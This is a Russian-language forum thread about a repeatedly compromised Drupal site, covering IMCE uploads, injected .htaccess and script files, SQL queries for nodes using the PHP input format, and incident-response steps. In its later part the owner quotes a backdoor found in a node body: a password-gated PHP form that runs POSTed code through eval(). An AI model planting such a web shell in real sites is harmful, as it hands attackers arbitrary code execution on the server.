О G.A. Vinogradov спасибо, удивляюсь как сам забыл про Надо меньше пить.
Но это не объясняет первопричину - а именно, то как залили htaccess файлы и js файлы на сервер.
У меня опять впечатление что я не могу найти первопричину взлома.

У меня под сайт отдельный сервак, в корне files лежит htaccess в нем ничего не менялось
SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006
Options None
Options +FollowSymLinks
Кроме автосоздания htaccess в юзерских папках есть способы? Пока по крону удаляю лишние.

Здравствуйте, это снова я, мой сайт продолжают ломать.
Удалось выяснить что происходит это так:
1. Злоумылненник заливает файл формата png или jpg на сервер(это можно всем зарегистрированым пользователям с помощью imce).
2. Каким-то образом заливают файл .htaccess в юзерскую папку
3. В файле находится вредоносный код.
4. Злоумышленики обращаются к файлу как к скрипту.

Подскажите пожалуйста как закрыть эту дыру, оставив возможность пользоваться imce.

select node_revisions.nid,node_revisions.uid
from node_revisions
inner join filter_formats on node_revisions.format=filter_formats.format
where filter_formats.name='PHP code';

Либо узнаешь номер формата PHP
select * from filter_formats;
Потом
select * from node_revisions where format=[тут подставить номер формата];

То-же делаешь для комментов
select comments.cid,comments.uid
from comments
inner join filter_formats on comments.format=filter_formats.format
where filter_formats.name='PHP code';

Спасибо, уже нашел действительно в блоке было.

После удаления скрипта сайт wartchdog все время говорит
Сообщение include(/var/www/html/sites/default/files/u19149/bit.inc) [function.include]: failed to open stream: No such file or directory в файле /var/www/html/includes/common.inc(1696) : eval()'d code в строке 6.

Где может подключаться этот файл?
Кричит только по ссылке /taxonomy/term/[term_num]

Нашел пару скриптов в файлах пользователей. Как их могли туда залить? расширения .inc и .js.
Используются файл менеджер IMCE есть ли в нем известные дыры? Как можно безопасно его настроить?

Стоит касперский. Троянов не находит. У корреспондентов и редакторов нет прав на форматы ввода и они не могут выбирать или менять формат ввода.
Не удается как раз выявить первопричину взлома.

Это стандартный алгоритм.
1. Находим ip.
2. Дропаем всю подсеть в iptables.
3. Смотрим куда и как он делал пост запрос и каким юзером.
4. Просим юзера поменять пароль.
5. Смотрим что он натворил.
6. Проверяем есть ли сессии для этого IP, удаляем если они под админом остались.

Это похоже на тушение пожара. А как его предотвратить?

Утром опять нашел в одной из нод в body php код и формат ноды был php code

$pass = $_POST['pass'];
$arbcode = $_POST['arbcode'];
if($pass!='cross'){
global $user;
if (!$user->uid)
{echo '
form method="post">';
}
}else{
form method="post">

" />
eval($arbcode);}

Дело точно не в форматах ввода, для пользователей отключены full html и phpcode.
Файлы на сервере проверяю find'ом.. меняются только картинки со времени обновления сайта которые лежат в sites/default/files.

Спасибо, покопался в нодах, нашел только это.

PHP code Роли не используют этот формат
Проверил.

Индексация пошла, после очистки в бд таблиц search_* .
На 38% опять остановилась. С чем могут быть связаны такие проблемы?